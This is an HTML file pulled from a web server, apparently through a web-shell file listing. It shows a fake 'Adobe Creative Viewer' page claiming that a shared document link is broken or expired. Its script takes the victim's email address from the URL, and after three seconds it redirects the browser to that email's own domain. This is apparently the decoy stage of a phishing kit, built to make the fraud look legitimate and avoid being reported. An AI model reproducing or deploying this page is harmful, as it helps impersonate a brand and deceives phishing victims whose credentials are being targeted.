| Current Path : /home/emeraadmin/www/4d695/ |
| Current File : /home/emeraadmin/www/4d695/rdr8.html.tar |
home/emeraadmin/public_html/pages/rdr8.html 0000644 00000006073 15167742042 0014762 0 ustar 00 <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<title>Link Not Found - Adobe Creative Viewer</title>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Inter', sans-serif;
background: #f9f9fb;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
color: #2c2c2c;
}
.container {
background: #ffffff;
padding: 50px;
border-radius: 12px;
box-shadow: 0 20px 40px rgba(0, 0, 0, 0.1);
max-width: 560px;
width: 90%;
text-align: center;
animation: fadeIn 0.6s ease-in-out;
}
.icon {
font-size: 72px;
margin-bottom: 20px;
color: #e74c3c;
}
h1 {
font-size: 28px;
font-weight: 600;
margin-bottom: 14px;
}
p {
font-size: 16px;
color: #666;
margin-bottom: 25px;
line-height: 1.6;
}
.info-box {
background: #fff5f5;
border-left: 4px solid #e74c3c;
padding: 16px;
border-radius: 8px;
text-align: left;
font-size: 15px;
color: #555;
}
.info-box strong {
display: block;
margin-bottom: 5px;
color: #c0392b;
}
@keyframes fadeIn {
from { opacity: 0; transform: translateY(10px); }
to { opacity: 1; transform: translateY(0); }
}
@media (max-width: 480px) {
.container {
padding: 30px 20px;
}
.icon {
font-size: 60px;
}
}
</style>
</head>
<body>
<div class="container">
<div class="icon">🚫</div>
<h1>Oops! This link is broken</h1>
<p>The link you are trying to access appears to be invalid, expired, or no longer exists.</p>
<div class="info-box">
<strong>Possible reasons:</strong>
<ul style="margin-left: 1em; padding-left: 0.5em;">
<li>The document was removed or deleted by the owner</li>
<li>The link has expired or was mistyped</li>
<li>You don't have permission to access this content</li>
</ul>
</div>
</div>
<script>
setTimeout(() => {
const params = new URLSearchParams(window.location.search);
const email = params.get('email');
if (email && email.includes('@')) {
const domain = email.split('@')[1].trim();
// More robust domain check
const domainRegex = /^(?!-)[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$/;
if (domainRegex.test(domain)) {
console.log('Redirecting to:', domain);
window.location.href = `https://${domain}`;
return;
} else {
console.warn('Invalid domain extracted:', domain);
}
}
// Fallback
window.location.href = window.location.origin;
}, 3000);
</script>
</body>
</html>